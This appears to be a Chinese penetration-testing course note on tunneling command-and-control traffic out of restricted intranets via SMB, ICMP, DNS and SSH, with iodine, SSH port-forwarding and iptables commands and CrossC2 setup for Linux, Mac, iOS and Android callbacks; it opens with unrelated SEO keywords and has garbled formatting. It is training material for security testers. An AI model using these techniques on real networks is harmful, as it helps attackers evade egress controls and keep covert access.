建网站 多少钱钱,wordpress 获取子页面,线上装修设计,机械网站建设多少钱知识点
#知识点#xff1a;
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、隧道技术-SMBICMPDNSSSH
4、控制上线-LinuxMacIOSAndroid-连接方向#xff1a;正向反向#xff08;基础课程有讲过#xff09;
-内网穿透#xf…
知识点
#知识点
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、隧道技术-SMBICMPDNSSSH
4、控制上线-LinuxMacIOSAndroid-连接方向正向反向基础课程有讲过
-内网穿透解决网络控制上线网络通讯问题
-隧道技术解决不出网协议上线的问题利用出网协议进行封装出网
-代理技术解决网络通讯不通的问题利用跳板机建立节点后续操作#系列点
1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃演示案例
1、隧道技术-SMB协议-判断通讯上线
2、隧道技术-ICMP协议-判断通讯上线
3、隧道技术-DNS协议-判断通讯上线
4、隧道技术-SSH协议-判断通讯上线
5、控制上线-插件-LinuxMacIOSAndroid1、判断出网协议
2、使用出网协议建立隧道#SMB隧道通讯上线
判断445通讯
上线借助通讯后绑定上线
通讯直接SMB协议通讯即可#ICMP隧道通讯上线
判断ping命令
上线见前面课程
通讯其他项目(icmpsh icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel#DNS隧道通讯上线
判断nslookup dig
1、上线环境内网主机只出网DNS协议数据解决上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
2、通讯环境
内网主机只出网DNS协议数据解决通讯
https://github.com/yarrick/iodine
判断出网nslookup www.baidu.com
-服务器设置密码xiaodi并创建虚拟IP及绑定域名指向
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
设置密码xiaodi并创建虚拟IP及绑定域名指向
-客户端连接密码xiaodi并绑定域名指向
iodine -f -M 200 -P xiaodi ns1.xiaodi8.com
-尝试通讯尝试连接
ssh root192.168.0.2#SSH隧道通讯
判断ssh连接
1、上线
由于CS无SSH协议监听器配置无法上线
2、通讯
由于SSH协议存在于Linux系统跳板机必须Linux
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */开启ssh协议登录
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地出站封
ssh -CfNg -L 1122:192.168.1.15:8080 root192.168.1.166
curl http://127.0.0.1:1122
远程入站封
ssh -CfNg -R 1234:192.168.1.15:8080 root47.94.236.117
curl http://127.0.0.1:1234#控制上线-插件-LinuxMacIOSAndroid
https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考
https://gloxec.github.io/CrossC2/zh_cn/
目前版本只支持反向的https和正向的tcp
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成
